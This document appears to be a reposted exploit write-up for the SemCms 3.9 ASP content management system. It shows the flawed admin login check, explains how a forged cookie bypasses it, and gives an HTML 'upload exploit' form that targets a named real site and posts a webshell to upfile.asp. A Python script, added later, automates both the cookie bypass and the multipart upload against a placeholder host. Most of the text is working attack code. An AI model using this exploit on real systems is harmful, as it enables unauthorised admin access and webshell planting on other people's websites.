Backend authentication check:
Check file: Clkj_Inc\WebOut.asp
<%
' Login-state check included by the backend pages. Both the password used
' for the lookup and the username written into the session are read straight
' from client-supplied cookies, and the cookie value is concatenated into the
' SQL string without any escaping.
if session("username")<>"" then
Set Rs=server.createobject("adodb.recordset")
Sql="select * from clkj_admin where clkj_password='"&request.cookies("userpas")("upas")&"'"
Rs.open sql,conn,1,1
if not (rs.eof and rs.bof) then
' session identity is taken from the cookie, not from the matched row
session("username")=request.cookies("username")("uname")
end if
else
Response.Write "<script language='javascript'>alert('Username and password are empty or have expired, please log in again!');top.location.href='index.html';</script>"
end if
%>
Just set the uname value of the username cookie to any string and open the backend at Clkj_Admin\nimda_admin.asp.
The filename prefix is interesting: nimda (admin spelled backwards).
SemCms exploit:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="backdoor.css" type="text/css" rel="stylesheet">
<script language="javascript">
<!--
function mysub()
{
esave.style.visibility="visible";
}
-->
</script>
</head>
<body>
<form name="form1" method="post" action="http://www.borictrade.cn//Clkj_Admin//upfile.asp" enctype="multipart/form-data" >
<div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
<TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR>
<td width=20%></td>
<TD bgcolor=#ff0000 width="60%"><TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
<TR>
<td bgcolor=#ffffff align=center><font color=red>Upload exploit</font></td>
</tr>
</table></td>
<td width=20%></td>
</tr>
</table>
</div>
<table width="95%" border="0" align="center" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td align="center" height="50">
<strong>semcms3.9 upload exploit by network QQ 378433756</strong>
<input type="hidden" name="filepath" value="/">
<input type="hidden" name="filelx" value="">
<input type="hidden" name="EditName" value="">
<input type="hidden" name="FormName" value="">
<input type="hidden" name="act" value="uploadfile">
</td>
</tr>
<tr >
<td align="center" id="upid" height="30"> Webshell filename:
<input name="imgname" type="text" id="imgname" size="20" class="tx1" >
<font color="#FF0000">// optional; after uploading, view the page source to find the saved path.</font> </td>
</tr>
<tr >
<td align="center" id="upid" height="50">Choose the webshell (as an image file):
<input type="file" name="file1" size="45" class="tx1" value="">
<input type="submit" name="Submit" value="Upload" onClick="javascript:mysub()">
<font color="#FF0000">// uploads to the web root by default; edit the filepath value in the source to change the path</font> </td>
</tr>
</table>
</form>
</body>
</html>
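The two requests this writeup describes, the cookie-based backend bypass and the multipart upload through upfile.asp, as an added script (not SemCms code and not from the original post) so they can be sent from Python instead of a browser. It uses only the standard library. The host is a placeholder, the file contents are a constructed placeholder rather than a webshell, and the function names are mine. The one protocol detail worth knowing: classic ASP "dictionary" cookies read with Request.Cookies("username")("uname") travel on the wire as `username=uname=<value>`, with subkeys joined by `&`, which is what asp_dict_cookie() produces.

```python
"""
Added example, not part of the SemCms writeup or of SemCms itself.

  1. Backend bypass: GET Clkj_Admin/nimda_admin.asp with a forged `username`
     cookie in classic-ASP dictionary form (username=uname=<value>).
  2. Upload: multipart POST to Clkj_Admin/upfile.asp carrying the same fields
     as the HTML exploit form (act=uploadfile, filepath, imgname, file1, ...).

Nothing is sent unless send_request() is called explicitly.
"""
import io
import urllib.request
import uuid
from urllib.parse import quote


def asp_dict_cookie(name, **subkeys):
    """Encode a classic-ASP dictionary cookie: name=key1=v1&key2=v2."""
    body = "&".join(f"{quote(k)}={quote(v)}" for k, v in subkeys.items())
    return f"{name}={body}"


def bypass_request(base_url, uname="admin"):
    """GET the admin page with the forged `username` cookie from the writeup."""
    headers = {"Cookie": asp_dict_cookie("username", uname=uname)}
    url = base_url.rstrip("/") + "/Clkj_Admin/nimda_admin.asp"
    return urllib.request.Request(url, headers=headers)


def build_multipart(fields, files, boundary=None):
    """Encode plain fields and file parts as multipart/form-data."""
    boundary = boundary or uuid.uuid4().hex
    buf = io.BytesIO()
    for name, value in fields.items():
        buf.write(f"--{boundary}\r\n".encode())
        buf.write(f'Content-Disposition: form-data; name="{name}"\r\n\r\n'.encode())
        buf.write(value.encode() + b"\r\n")
    for name, (filename, content, ctype) in files.items():
        buf.write(f"--{boundary}\r\n".encode())
        buf.write(
            f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'.encode()
        )
        buf.write(f"Content-Type: {ctype}\r\n\r\n".encode())
        buf.write(content + b"\r\n")
    buf.write(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", buf.getvalue()


def upload_request(base_url, filename, content, filepath="/", imgname="", cookie=None):
    """POST to upfile.asp with the field names used by the HTML exploit form."""
    fields = {
        "filepath": filepath,   # destination directory; "/" is the web root, as in the form
        "filelx": "",
        "EditName": "",
        "FormName": "",
        "act": "uploadfile",
        "imgname": imgname,     # optional saved-file name, the form's text box
    }
    files = {"file1": (filename, content, "image/jpeg")}
    ctype, body = build_multipart(fields, files)
    headers = {"Content-Type": ctype}
    if cookie:
        headers["Cookie"] = cookie  # reuse the forged cookie if the upload page checks it
    url = base_url.rstrip("/") + "/Clkj_Admin/upfile.asp"
    return urllib.request.Request(url, data=body, headers=headers, method="POST")


def send_request(req, timeout=10):
    """Actually send a prepared request; returns (status, body)."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    base = "http://target.example"  # placeholder host
    cookie = asp_dict_cookie("username", uname="anything")
    print(bypass_request(base, uname="anything").get_header("Cookie"))
    # Constructed placeholder payload, deliberately not a webshell.
    req = upload_request(base, "test.jpg", b"placeholder content", imgname="test", cookie=cookie)
    print(req.get_method(), req.full_url, len(req.data), "bytes")
```

After a real upload, the saved path is what the form's comment says to look for in the response source; `send_request()` returns the body so it can be searched for it.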